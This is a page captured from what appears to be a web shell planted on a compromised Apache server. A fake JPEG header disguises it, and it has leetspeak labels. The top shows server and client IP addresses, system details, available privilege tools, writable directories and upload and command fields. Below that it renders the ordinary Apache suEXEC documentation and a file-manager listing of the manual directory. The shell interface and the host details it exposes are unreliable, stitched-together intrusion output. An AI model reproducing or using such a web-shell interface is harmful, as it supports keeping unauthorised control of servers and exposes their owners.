JFIFHHC     C  " 5????! ??? JFIF    >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality C     p!ranha?
Server IP : 172.67.137.82  /  Your IP : 104.23.243.85
Web Server : Apache/2.4.51 (Unix) OpenSSL/1.1.1n
System : Linux ip-172-26-8-243 4.19.0-27-cloud-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : daemon ( 1)
PHP Version : 7.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/bitnami/apache/manual/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /opt/bitnami/apache/manual//suexec.html.en
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<!--
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
              This file is generated from xml source: DO NOT EDIT
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
      -->
<title>suEXEC Support - Apache HTTP Server Version 2.4</title>
<link href="./style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet" />
<link href="./style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size" />
<link href="./style/css/manual-print.css" rel="stylesheet" media="print" type="text/css" /><link rel="stylesheet" type="text/css" href="./style/css/prettify.css" />
<script src="./style/scripts/prettify.min.js" type="text/javascript">
</script>

<link href="./images/favicon.ico" rel="shortcut icon" /></head>
<body id="manual-page"><div id="page-header">
<p class="menu"><a href="./mod/">Modules</a> | <a href="./mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="./glossary.html">Glossary</a> | <a href="./sitemap.html">Sitemap</a></p>
<p class="apache">Apache HTTP Server Version 2.4</p>
<img alt="" src="./images/feather.png" /></div>
<div class="up"><a href="./"><img title="&lt;-" alt="&lt;-" src="./images/left.gif" /></a></div>
<div id="path">
<a href="http://www.apache.org/">Apache</a> &gt; <a href="http://httpd.apache.org/">HTTP Server</a> &gt; <a href="http://httpd.apache.org/docs/">Documentation</a> &gt; <a href="./">Version 2.4</a></div><div id="page-content"><div id="preamble"><h1>suEXEC Support</h1>
<div class="toplang">
<p><span>Available Languages: </span><a href="./en/suexec.html" title="English">&nbsp;en&nbsp;</a> |
<a href="./fr/suexec.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="./ja/suexec.html" hreflang="ja" rel="alternate" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="./ko/suexec.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="./tr/suexec.html" hreflang="tr" rel="alternate" title="Türkçe">&nbsp;tr&nbsp;</a></p>
</div>

    <p>The <strong>suEXEC</strong> feature provides users of the Apache
    HTTP Server the ability
    to run <strong>CGI</strong> and <strong>SSI</strong> programs
    under user IDs different from the user ID of the calling
    web server. Normally, when a CGI or SSI program executes, it
    runs as the same user who is running the web server.</p>

    <p>Used properly, this feature can reduce
    considerably the security risks involved with allowing users to
    develop and run private CGI or SSI programs. However, if suEXEC
    is improperly configured, it can cause any number of problems
    and possibly create new holes in your computer's security. If
    you aren't familiar with managing <em>setuid root</em> programs
    and the security issues they present, we highly recommend that
    you not consider using suEXEC.</p>
  </div>
<div id="quickview"><a href="https://www.apache.org/foundation/contributing.html" class="badge"><img src="https://www.apache.org/images/SupportApache-small.png" alt="Support Apache!" /></a><ul id="toc"><li><img alt="" src="./images/down.gif" /> <a href="#before">Before we begin</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#model">suEXEC Security Model</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#install">Configuring &amp; Installing
    suEXEC</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#enable">Enabling &amp; Disabling
    suEXEC</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#usage">Using suEXEC</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#debug">Debugging suEXEC</a></li>
<li><img alt="" src="./images/down.gif" /> <a href="#jabberwock">Beware the Jabberwock:
    Warnings &amp; Examples</a></li>
</ul><h3>See also</h3><ul class="seealso"><li><a href="#comments_section">Comments</a></li></ul></div>
<div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="before" id="before">Before we begin</a></h2>

    <p>Before jumping head-first into this document,
    you should be aware that certain assumptions are made about you and
    the environment in which you will be using suexec.</p>

    <p>First, it is assumed that you are using a UNIX
    derivative operating system that is capable of
    <strong>setuid</strong> and <strong>setgid</strong> operations.
    All command examples are given in this regard. Other platforms,
    if they are capable of supporting suEXEC, may differ in their
    configuration.</p>

    <p>Second, it is assumed you are familiar with
    some basic concepts of your computer's security and its
    administration. This involves an understanding of
    <strong>setuid/setgid</strong> operations and the various
    effects they may have on your system and its level of
    security.</p>

    <p>Third, it is assumed that you are using an
    <strong>unmodified</strong> version of suEXEC code. All code
    for suEXEC has been carefully scrutinized and tested by the
    developers as well as numerous beta testers. Every precaution
    has been taken to ensure a simple yet solidly safe base of
    code. Altering this code can cause unexpected problems and new
    security risks. It is <strong>highly</strong> recommended you
    not alter the suEXEC code unless you are well versed in the
    particulars of security programming and are willing to share
    your work with the Apache HTTP Server development team for consideration.</p>

    <p>Fourth, and last, it has been the decision of
    the Apache HTTP Server development team to <strong>NOT</strong> make suEXEC part of
    the default installation of Apache httpd. To this end, suEXEC
    configuration requires of the administrator careful attention
    to details. After due consideration has been given to the
    various settings for suEXEC, the administrator may install
    suEXEC through normal installation methods. The values for
    these settings need to be carefully determined and specified by
    the administrator to properly maintain system security during
    the use of suEXEC functionality. It is through this detailed
    process that we hope to limit suEXEC
    installation only to those who are careful and determined
    enough to use it.</p>

    <p>Still with us? Yes? Good. Let's move on!</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="model" id="model">suEXEC Security Model</a></h2>

    <p>Before we begin configuring and installing
    suEXEC, we will first discuss the security model you are about
    to implement. By doing so, you may better understand what
    exactly is going on inside suEXEC and what precautions are
    taken to ensure your system's security.</p>

    <p><strong>suEXEC</strong> is based on a setuid
    "wrapper" program that is called by the main Apache HTTP Server.
    This wrapper is called when an HTTP request is made for a CGI
    or SSI program that the administrator has designated to run as
    a userid other than that of the main server. When such a
    request is made, Apache httpd provides the suEXEC wrapper with the
    program's name and the user and group IDs under which the
    program is to execute.</p>

    <p>The wrapper then employs the following process
    to determine success or failure -- if any one of these
    conditions fail, the program logs the failure and exits with an
    error, otherwise it will continue:</p>

    <ol>
      <li>
        <strong>Is the user executing this wrapper a valid user of
        this system?</strong>

        <p class="indent">
          This is to ensure that the user executing the wrapper is
          truly a user of the system.
        </p>
     </li>

     <li>
        <strong>Was the wrapper called with the proper number of
        arguments?</strong>

        <p class="indent">
          The wrapper will only execute if it is given the proper
          number of arguments. The proper argument format is known
          to the Apache HTTP Server. If the wrapper is not receiving
          the proper number of arguments, it is either being
          hacked, or there is something wrong with the suEXEC
          portion of your Apache httpd binary.
        </p>
      </li>

      <li>
        <strong>Is this valid user allowed to run the
        wrapper?</strong>

        <p class="indent">
          Is this user the user allowed to run this wrapper? Only
          one user (the Apache user) is allowed to execute this
          program.
        </p>
      </li>

      <li>
        <strong>Does the target CGI or SSI program have an unsafe
        hierarchical reference?</strong>

        <p class="indent">
          Does the target CGI or SSI program's path contain a leading
          '/' or have a '..' backreference? These are not allowed; the
          target CGI/SSI program must reside within suEXEC's document
          root (see <code>--with-suexec-docroot=<em>DIR</em></code>
          below).
        </p>
      </li>

      <li>
        <strong>Is the target user name valid?</strong>

        <p class="indent">
          Does the target user exist?
        </p>
      </li>

      <li>
        <strong>Is the target group name valid?</strong>

        <p class="indent">
          Does the target group exist?
        </p>
      </li>

      <li>
        <strong>Is the target user <em>NOT</em> superuser?</strong>


        <p class="indent">
          suEXEC does not allow <code><em>root</em></code>
          to execute CGI/SSI programs.
        </p>
      </li>

      <li>
        <strong>Is the target userid <em>ABOVE</em> the minimum ID
        number?</strong>

        <p class="indent">
          The minimum user ID number is specified during
          configuration. This allows you to set the lowest possible
          userid that will be allowed to execute CGI/SSI programs.
          This is useful to block out "system" accounts.
        </p>
      </li>

      <li>
        <strong>Is the target group <em>NOT</em> the superuser
        group?</strong>

        <p class="indent">
          Presently, suEXEC does not allow the <code><em>root</em></code>
          group to execute CGI/SSI programs.
        </p>
      </li>

      <li>
        <strong>Is the target groupid <em>ABOVE</em> the minimum ID
        number?</strong>

        <p class="indent">
          The minimum group ID number is specified during
          configuration. This allows you to set the lowest possible
          groupid that will be allowed to execute CGI/SSI programs.
          This is useful to block out "system" groups.
        </p>
      </li>

      <li>
        <strong>Can the wrapper successfully become the target user
        and group?</strong>

        <p class="indent">
          Here is where the program becomes the target user and
          group via setuid and setgid calls. The group access list
          is also initialized with all of the groups of which the
          user is a member.
        </p>
      </li>

      <li>
        <strong>Can we change directory to the one in which the target
        CGI/SSI program resides?</strong>

        <p class="indent">
          If it doesn't exist, it can't very well contain files. If we
          can't change directory to it, it might as well not exist.
        </p>
      </li>

      <li>
        <strong>Is the directory within the httpd webspace?</strong>

        <p class="indent">
          If the request is for a regular portion of the server, is
          the requested directory within suEXEC's document root? If
          the request is for a <code class="directive"><a href="./mod/mod_userdir.html#userdir">UserDir</a></code>, is the requested directory
          within the directory configured as suEXEC's userdir (see
          <a href="#install">suEXEC's configuration options</a>)?
        </p>
      </li>

      <li>
        <strong>Is the directory <em>NOT</em> writable by anyone
        else?</strong>

        <p class="indent">
          We don't want to open up the directory to others; only
          the owner user may be able to alter this directories
          contents.
        </p>
      </li>

      <li>
        <strong>Does the target CGI/SSI program exist?</strong>

        <p class="indent">
          If it doesn't exists, it can't very well be executed.
        </p>
      </li>

      <li>
        <strong>Is the target CGI/SSI program <em>NOT</em> writable
        by anyone else?</strong>

        <p class="indent">
          We don't want to give anyone other than the owner the
          ability to change the CGI/SSI program.
        </p>
      </li>

      <li>
        <strong>Is the target CGI/SSI program <em>NOT</em> setuid or
        setgid?</strong>

        <p class="indent">
          We do not want to execute programs that will then change
          our UID/GID again.
        </p>
      </li>

      <li>
        <strong>Is the target user/group the same as the program's
        user/group?</strong>

        <p class="indent">
          Is the user the owner of the file?
        </p>
      </li>

      <li>
        <strong>Can we successfully clean the process environment
        to ensure safe operations?</strong>

        <p class="indent">
          suEXEC cleans the process's environment by establishing a
          safe execution PATH (defined during configuration), as
          well as only passing through those variables whose names
          are listed in the safe environment list (also created
          during configuration).
        </p>
      </li>

      <li>
        <strong>Can we successfully become the target CGI/SSI program
        and execute?</strong>

        <p class="indent">
          Here is where suEXEC ends and the target CGI/SSI program begins.
        </p>
      </li>
    </ol>

    <p>This is the standard operation of the
    suEXEC wrapper's security model. It is somewhat stringent and
    can impose new limitations and guidelines for CGI/SSI design,
    but it was developed carefully step-by-step with security in
    mind.</p>

    <p>For more information as to how this security
    model can limit your possibilities in regards to server
    configuration, as well as what security risks can be avoided
    with a proper suEXEC setup, see the <a href="#jabberwock">"Beware the Jabberwock"</a> section of this
    document.</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="install" id="install">Configuring &amp; Installing
    suEXEC</a></h2>

    <p>Here's where we begin the fun.</p>

    <p><strong>suEXEC configuration
    options</strong><br />
    </p>

    <dl>
      <dt><code>--enable-suexec</code></dt>

      <dd>This option enables the suEXEC feature which is never
      installed or activated by default. At least one
      <code>--with-suexec-xxxxx</code> option has to be provided
      together with the <code>--enable-suexec</code> option to let
      APACI accept your request for using the suEXEC feature.</dd>

      <dt><code>--with-suexec-bin=<em>PATH</em></code></dt>

      <dd>The path to the <code>suexec</code> binary must be hard-coded
      in the server for security reasons. Use this option to override
      the default path. <em>e.g.</em>
      <code>--with-suexec-bin=/usr/sbin/suexec</code></dd>

      <dt><code>--with-suexec-caller=<em>UID</em></code></dt>

      <dd>The <a href="mod/mpm_common.html#user">username</a> under which
      httpd normally runs. This is the only user allowed to
      execute the suEXEC wrapper.</dd>

      <dt><code>--with-suexec-userdir=<em>DIR</em></code></dt>

      <dd>Define to be the subdirectory under users' home
      directories where suEXEC access should be allowed. All
      executables under this directory will be executable by suEXEC
      as the user so they should be "safe" programs. If you are
      using a "simple" <code class="directive"><a href="./mod/mod_userdir.html#userdir">UserDir</a></code>
      directive (ie. one without a "*" in it) this should be set to the same
      value. suEXEC will not work properly in cases where the <code class="directive"><a href="./mod/mod_userdir.html#userdir">UserDir</a></code> directive points to
      a location that is not the same as the user's home directory
      as referenced in the <code>passwd</code> file. Default value is
      "<code>public_html</code>".<br />
      If you have virtual hosts with a different <code class="directive"><a href="./mod/mod_userdir.html#userdir">UserDir</a></code> for each,
      you will need to define them to all reside in one parent
      directory; then name that parent directory here. <strong>If
      this is not defined properly, "~userdir" cgi requests will
      not work!</strong></dd>

      <dt><code>--with-suexec-docroot=<em>DIR</em></code></dt>

      <dd>Define as the DocumentRoot set for httpd. This will be
      the only hierarchy (aside from <code class="directive"><a href="./mod/mod_userdir.html#userdir">UserDir</a></code>s) that can be used for suEXEC behavior. The
      default directory is the <code>--datadir</code> value with the suffix
      "<code>/htdocs</code>", <em>e.g.</em> if you configure with
      "<code>--datadir=/home/apache</code>" the directory
      "<code>/home/apache/htdocs</code>" is used as document root for the
      suEXEC wrapper.</dd>

      <dt><code>--with-suexec-uidmin=<em>UID</em></code></dt>

      <dd>Define this as the lowest UID allowed to be a target user
      for suEXEC. For most systems, 500 or 100 is common. Default
      value is 100.</dd>

      <dt><code>--with-suexec-gidmin=<em>GID</em></code></dt>

      <dd>Define this as the lowest GID allowed to be a target
      group for suEXEC. For most systems, 100 is common and
      therefore used as default value.</dd>

      <dt><code>--with-suexec-logfile=<em>FILE</em></code></dt>

      <dd>This defines the filename to which all suEXEC
      transactions and errors are logged (useful for auditing and
      debugging purposes). By default the logfile is named
      "<code>suexec_log</code>" and located in your standard logfile
      directory (<code>--logfiledir</code>).</dd>

      <dt><code>--with-suexec-safepath=<em>PATH</em></code></dt>

      <dd>Define a safe PATH environment to pass to CGI
      executables. Default value is
      "<code>/usr/local/bin:/usr/bin:/bin</code>".</dd>
    </dl>

    <h3>Compiling and installing the suEXEC wrapper</h3>
      

      <p>If you have enabled the suEXEC feature with the
      <code>--enable-suexec</code> option the <code>suexec</code> binary
      (together with httpd itself) is automatically built if you execute
      the <code>make</code> command.</p>

      <p>After all components have been built you can execute the
      command <code>make install</code> to install them. The binary image
      <code>suexec</code> is installed in the directory defined by the
      <code>--sbindir</code> option. The default location is
      "/usr/local/apache2/bin/suexec".</p>

      <p>Please note that you need <strong><em>root
      privileges</em></strong> for the installation step. In order
      for the wrapper to set the user ID, it must be installed as
      owner <code><em>root</em></code> and must have the setuserid
      execution bit set for file modes.</p>
    

    <h3>Setting paranoid permissions</h3>
      

      <p>Although the suEXEC wrapper will check to ensure that its
      caller is the correct user as specified with the
      <code>--with-suexec-caller</code> <code class="program"><a href="./programs/configure.html">configure</a></code>
      option, there is
      always the possibility that a system or library call suEXEC uses
      before this check may be exploitable on your system. To counter
      this, and because it is best-practise in general, you should use
      filesystem permissions to ensure that only the group httpd
      runs as may execute suEXEC.</p>

      <p>If for example, your web server is configured to run as:</p>

      <pre class="prettyprint lang-config">User www
Group webgroup</pre>


      <p>and <code class="program"><a href="./programs/suexec.html">suexec</a></code> is installed at
      "/usr/local/apache2/bin/suexec", you should run:</p>

      <div class="example"><p><code>
          chgrp webgroup /usr/local/apache2/bin/suexec<br />
          chmod 4750 /usr/local/apache2/bin/suexec<br />
      </code></p></div>

      <p>This will ensure that only the group httpd runs as can even
      execute the suEXEC wrapper.</p>
    
</div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="enable" id="enable">Enabling &amp; Disabling
    suEXEC</a></h2>

    <p>Upon startup of httpd, it looks for the file
    <code class="program"><a href="./programs/suexec.html">suexec</a></code> in the directory defined by the
    <code>--sbindir</code> option (default is
    "/usr/local/apache/sbin/suexec"). If httpd finds a properly
    configured suEXEC wrapper, it will print the following message
    to the error log:</p>

<div class="example"><p><code>
    [notice] suEXEC mechanism enabled (wrapper: <var>/path/to/suexec</var>)
</code></p></div>

    <p>If you don't see this message at server startup, the server is
    most likely not finding the wrapper program where it expects
    it, or the executable is not installed <em>setuid root</em>.</p>

     <p>If you want to enable the suEXEC mechanism for the first time
    and an Apache HTTP Server is already running you must kill and
    restart httpd. Restarting it with a simple HUP or USR1 signal
    will not be enough. </p>
     <p>If you want to disable suEXEC you should kill and restart
    httpd after you have removed the <code class="program"><a href="./programs/suexec.html">suexec</a></code> file.</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="usage" id="usage">Using suEXEC</a></h2>

    <p>Requests for CGI programs will call the suEXEC wrapper only if
    they are for a virtual host containing a <code class="directive"><a href="./mod/mod_suexec.html#suexecusergroup">SuexecUserGroup</a></code> directive or if
    they are processed by <code class="module"><a href="./mod/mod_userdir.html">mod_userdir</a></code>.</p>

    <p><strong>Virtual Hosts:</strong><br /> One way to use the suEXEC
    wrapper is through the <code class="directive"><a href="./mod/mod_suexec.html#suexecusergroup">SuexecUserGroup</a></code> directive in
    <code class="directive"><a href="./mod/core.html#virtualhost">VirtualHost</a></code> definitions.  By
    setting this directive to values different from the main server
    user ID, all requests for CGI resources will be executed as the
    <em>User</em> and <em>Group</em> defined for that <code class="directive"><a href="./mod/core.html#virtualhost">&lt;VirtualHost&gt;</a></code>. If this
    directive is not specified for a <code class="directive"><a href="./mod/core.html#virtualhost">&lt;VirtualHost&gt;</a></code> then the main server userid
    is assumed.</p>

    <p><strong>User directories:</strong><br /> Requests that are
     processed by <code class="module"><a href="./mod/mod_userdir.html">mod_userdir</a></code> will call the suEXEC
     wrapper to execute CGI programs under the userid of the requested
     user directory.  The only requirement needed for this feature to
     work is for CGI execution to be enabled for the user and that the
     script must meet the scrutiny of the <a href="#model">security
     checks</a> above.  See also the
     <code>--with-suexec-userdir</code> <a href="#install">compile
     time option</a>.</p> </div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="debug" id="debug">Debugging suEXEC</a></h2>

    <p>The suEXEC wrapper will write log information
    to the file defined with the <code>--with-suexec-logfile</code>
    option as indicated above. If you feel you have configured and
    installed the wrapper properly, have a look at this log and the
    error_log for the server to see where you may have gone astray.</p>

</div><div class="top"><a href="#page-header"><img alt="top" src="./images/up.gif" /></a></div>
<div class="section">
<h2><a name="jabberwock" id="jabberwock">Beware the Jabberwock:
    Warnings &amp; Examples</a></h2>

    <p><strong>NOTE!</strong> This section may not be
    complete.</p>

    <p>There are a few points of interest regarding
    the wrapper that can cause limitations on server setup. Please
    review these before submitting any "bugs" regarding suEXEC.</p>

    <p><strong>suEXEC Points Of Interest</strong></p>
    <ul>

      <li>
        Hierarchy limitations

        <p class="indent">
          For security and efficiency reasons, all suEXEC requests
          must remain within either a top-level document root for
          virtual host requests, or one top-level personal document
          root for userdir requests. For example, if you have four
          VirtualHosts configured, you would need to structure all
          of your VHosts' document roots off of one main httpd
          document hierarchy to take advantage of suEXEC for
          VirtualHosts. (Example forthcoming.)
        </p>
      </li>

      <li>
        suEXEC's PATH environment variable

        <p class="indent">
          This can be a dangerous thing to change. Make certain
          every path you include in this define is a
          <strong>trusted</strong> directory. You don't want to
          open people up to having someone from across the world
          running a trojan horse on them.
        </p>
      </li>

      <li>
        Altering the suEXEC code

        <p class="indent">
          Again, this can cause <strong>Big Trouble</strong> if you
          try this without knowing what you are doing. Stay away
          from it if at all possible.
        </p>
      </li>
    </ul>

</div></div>
<div class="bottomlang">
<p><span>Available Languages: </span><a href="./en/suexec.html" title="English">&nbsp;en&nbsp;</a> |
<a href="./fr/suexec.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="./ja/suexec.html" hreflang="ja" rel="alternate" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="./ko/suexec.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="./tr/suexec.html" hreflang="tr" rel="alternate" title="Türkçe">&nbsp;tr&nbsp;</a></p>
</div><div class="top"><a href="#page-header"><img src="./images/up.gif" alt="top" /></a></div><div class="section"><h2><a id="comments_section" name="comments_section">Comments</a></h2><div class="warning"><strong>Notice:</strong><br />This is not a Q&amp;A section. Comments placed here should be pointed towards suggestions on improving the documentation or server, and may be removed by our moderators if they are either implemented or considered invalid/off-topic. Questions on how to manage the Apache HTTP Server should be directed at either our IRC channel, #httpd, on Libera.chat, or sent to our <a href="https://httpd.apache.org/lists.html">mailing lists</a>.</div>
<script type="text/javascript"><!--//--><![CDATA[//><!--
var comments_shortname = 'httpd';
var comments_identifier = 'http://httpd.apache.org/docs/2.4/suexec.html';
(function(w, d) {
    if (w.location.hostname.toLowerCase() == "httpd.apache.org") {
        d.write('<div id="comments_thread"><\/div>');
        var s = d.createElement('script');
        s.type = 'text/javascript';
        s.async = true;
        s.src = 'https://comments.apache.org/show_comments.lua?site=' + comments_shortname + '&page=' + comments_identifier;
        (d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s);
    }
    else { 
        d.write('<div id="comments_thread">Comments are disabled for this page at the moment.<\/div>');
    }
})(window, document);
//--><!]]></script></div><div id="footer">
<p class="apache">Copyright 2021 The Apache Software Foundation.<br />Licensed under the <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a>.</p>
<p class="menu"><a href="./mod/">Modules</a> | <a href="./mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="./glossary.html">Glossary</a> | <a href="./sitemap.html">Sitemap</a></p></div><script type="text/javascript"><!--//--><![CDATA[//><!--
if (typeof(prettyPrint) !== 'undefined') {
    prettyPrint();
}
//--><!]]></script>
</body></html>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
October 07 2021 19:11:53
root / root
0755
developer
--
October 07 2021 18:50:07
root / root
0755
faq
--
October 07 2021 18:50:07
root / root
0755
howto
--
October 07 2021 18:50:07
root / root
0755
images
--
October 07 2021 18:50:07
root / root
0755
misc
--
October 07 2021 18:50:07
root / root
0755
mod
--
October 07 2021 18:50:08
root / root
0755
platform
--
October 07 2021 18:50:08
root / root
0755
programs
--
October 07 2021 18:50:08
root / root
0755
rewrite
--
October 07 2021 18:50:08
root / root
0755
ssl
--
October 07 2021 18:50:08
root / root
0755
style
--
October 07 2021 18:50:08
root / root
0755
vhosts
--
October 07 2021 18:50:08
root / root
0755
BUILDING
0.1 KB
May 09 2011 20:13:01
root / root
0644
LICENSE
11.092 KB
November 20 2004 20:16:24
root / root
0644
bind.html
0.525 KB
July 28 2020 12:39:54
root / root
0644
bind.html.de
15.279 KB
September 16 2021 07:58:22
root / root
0644
bind.html.en
15.191 KB
July 09 2021 12:26:10
root / root
0644
bind.html.fr.utf8
16.491 KB
July 09 2021 12:26:10
root / root
0644
bind.html.ja.utf8
14.336 KB
July 09 2021 12:26:10
root / root
0644
bind.html.ko.euc-kr
10.945 KB
July 09 2021 12:26:10
root / root
0644
bind.html.tr.utf8
16.215 KB
July 09 2021 12:26:10
root / root
0644
caching.html
0.285 KB
July 28 2020 12:39:54
root / root
0644
caching.html.en
50.662 KB
July 09 2021 12:26:10
root / root
0644
caching.html.fr.utf8
56.432 KB
July 09 2021 12:26:10
root / root
0644
caching.html.tr.utf8
54.689 KB
July 09 2021 12:26:10
root / root
0644
configuring.html
0.566 KB
July 28 2020 12:39:54
root / root
0644
configuring.html.de
16.708 KB
September 16 2021 07:58:22
root / root
0644
configuring.html.en
17.358 KB
July 09 2021 12:26:10
root / root
0644
configuring.html.fr.utf8
18.842 KB
July 09 2021 12:26:10
root / root
0644
configuring.html.ja.utf8
16.982 KB
July 09 2021 12:26:10
root / root
0644
configuring.html.ko.euc-kr
13.708 KB
July 09 2021 12:26:10
root / root
0644
configuring.html.tr.utf8
18.565 KB
July 09 2021 12:26:10
root / root
0644
content-negotiation.html
0.517 KB
July 28 2020 12:39:54
root / root
0644
content-negotiation.html.en
33.754 KB
July 09 2021 12:26:10
root / root
0644
content-negotiation.html.fr.utf8
38.731 KB
July 09 2021 12:26:10
root / root
0644
content-negotiation.html.ja.utf8
40.967 KB
July 09 2021 12:26:10
root / root
0644
content-negotiation.html.ko.euc-kr
28.477 KB
July 09 2021 12:26:10
root / root
0644
content-negotiation.html.tr.utf8
37.084 KB
July 09 2021 12:26:10
root / root
0644
convenience.map
35.479 KB
June 10 2020 21:25:03
root / root
0644
custom-error.html
0.572 KB
July 28 2020 12:39:54
root / root
0644
custom-error.html.en
13.579 KB
July 09 2021 12:26:10
root / root
0644
custom-error.html.es
13.299 KB
September 16 2021 07:58:22
root / root
0644
custom-error.html.fr.utf8
14.514 KB
July 09 2021 12:26:10
root / root
0644
custom-error.html.ja.utf8
13.213 KB
July 09 2021 12:26:10
root / root
0644
custom-error.html.ko.euc-kr
11.518 KB
July 09 2021 12:26:10
root / root
0644
custom-error.html.tr.utf8
14.17 KB
July 09 2021 12:26:10
root / root
0644
dns-caveats.html
0.478 KB
July 28 2020 12:39:54
root / root
0644
dns-caveats.html.en
12.37 KB
July 09 2021 12:26:10
root / root
0644
dns-caveats.html.fr.utf8
13.388 KB
July 09 2021 12:26:10
root / root
0644
dns-caveats.html.ja.utf8
17.373 KB
July 09 2021 12:26:10
root / root
0644
dns-caveats.html.ko.euc-kr
13.47 KB
July 09 2021 12:26:10
root / root
0644
dns-caveats.html.tr.utf8
12.793 KB
July 09 2021 12:26:10
root / root
0644
dso.html
0.438 KB
July 28 2020 12:39:54
root / root
0644
dso.html.en
19.267 KB
July 09 2021 12:26:10
root / root
0644
dso.html.fr.utf8
22.209 KB
July 09 2021 12:26:10
root / root
0644
dso.html.ja.utf8
23.279 KB
July 09 2021 12:26:10
root / root
0644
dso.html.ko.euc-kr
16.592 KB
July 09 2021 12:26:10
root / root
0644
dso.html.tr.utf8
21.482 KB
July 09 2021 12:26:10
root / root
0644
env.html
0.438 KB
July 28 2020 12:39:54
root / root
0644
env.html.en
30.623 KB
July 09 2021 12:26:10
root / root
0644
env.html.fr.utf8
33.064 KB
July 09 2021 12:26:10
root / root
0644
env.html.ja.utf8
30.558 KB
July 09 2021 12:26:10
root / root
0644
env.html.ko.euc-kr
22.142 KB
July 09 2021 12:26:10
root / root
0644
env.html.tr.utf8
32.707 KB
July 09 2021 12:26:10
root / root
0644
expr.html
0.194 KB
July 28 2020 12:39:54
root / root
0644
expr.html.en
35.784 KB
July 09 2021 12:26:10
root / root
0644
expr.html.fr.utf8
38.221 KB
July 09 2021 12:26:10
root / root
0644
filter.html
0.537 KB
July 28 2020 12:39:54
root / root
0644
filter.html.en
14.838 KB
July 09 2021 12:26:10
root / root
0644
filter.html.es
17.276 KB
September 16 2021 07:58:22
root / root
0644
filter.html.fr.utf8
16.012 KB
July 09 2021 12:26:10
root / root
0644
filter.html.ja.utf8
9.23 KB
July 09 2021 12:26:10
root / root
0644
filter.html.ko.euc-kr
8.366 KB
July 09 2021 12:26:10
root / root
0644
filter.html.tr.utf8
15.998 KB
July 09 2021 12:26:10
root / root
0644
getting-started.html
0.309 KB
October 13 2020 11:25:34
root / root
0644
getting-started.html.en
15.217 KB
July 09 2021 12:26:10
root / root
0644
getting-started.html.fr.utf8
17.183 KB
July 09 2021 12:26:10
root / root
0644
getting-started.html.ru.utf8
21.271 KB
July 09 2021 12:26:10
root / root
0644
glossary.html
0.635 KB
July 28 2020 12:39:54
root / root
0644
glossary.html.de
34.805 KB
September 16 2021 07:58:22
root / root
0644
glossary.html.en
30.016 KB
July 09 2021 12:26:10
root / root
0644
glossary.html.es
31.968 KB
September 16 2021 07:58:22
root / root
0644
glossary.html.fr.utf8
34.009 KB
July 09 2021 12:26:10
root / root
0644
glossary.html.ja.utf8
32.028 KB
July 09 2021 12:26:10
root / root
0644
glossary.html.ko.euc-kr
20.879 KB
July 09 2021 12:26:10
root / root
0644
glossary.html.tr.utf8
33.106 KB
July 09 2021 12:26:10
root / root
0644
handler.html
0.634 KB
July 28 2020 12:39:54
root / root
0644
handler.html.en
11.785 KB
July 09 2021 12:26:10
root / root
0644
handler.html.es
12.718 KB
September 16 2021 07:58:22
root / root
0644
handler.html.fr.utf8
12.597 KB
July 09 2021 12:26:10
root / root
0644
handler.html.ja.utf8
13.361 KB
July 09 2021 12:26:10
root / root
0644
handler.html.ko.euc-kr
11.35 KB
July 09 2021 12:26:10
root / root
0644
handler.html.tr.utf8
12.393 KB
July 09 2021 12:26:10
root / root
0644
handler.html.zh-cn.utf8
11.339 KB
July 09 2021 12:26:10
root / root
0644
index.html
0.958 KB
October 13 2020 11:25:34
root / root
0644
index.html.da
8.854 KB
April 22 2021 06:43:44
root / root
0644
index.html.de
9.28 KB
September 16 2021 07:58:22
root / root
0644
index.html.en
9.107 KB
April 22 2021 06:43:44
root / root
0644
index.html.es
9.751 KB
September 16 2021 07:58:22
root / root
0644
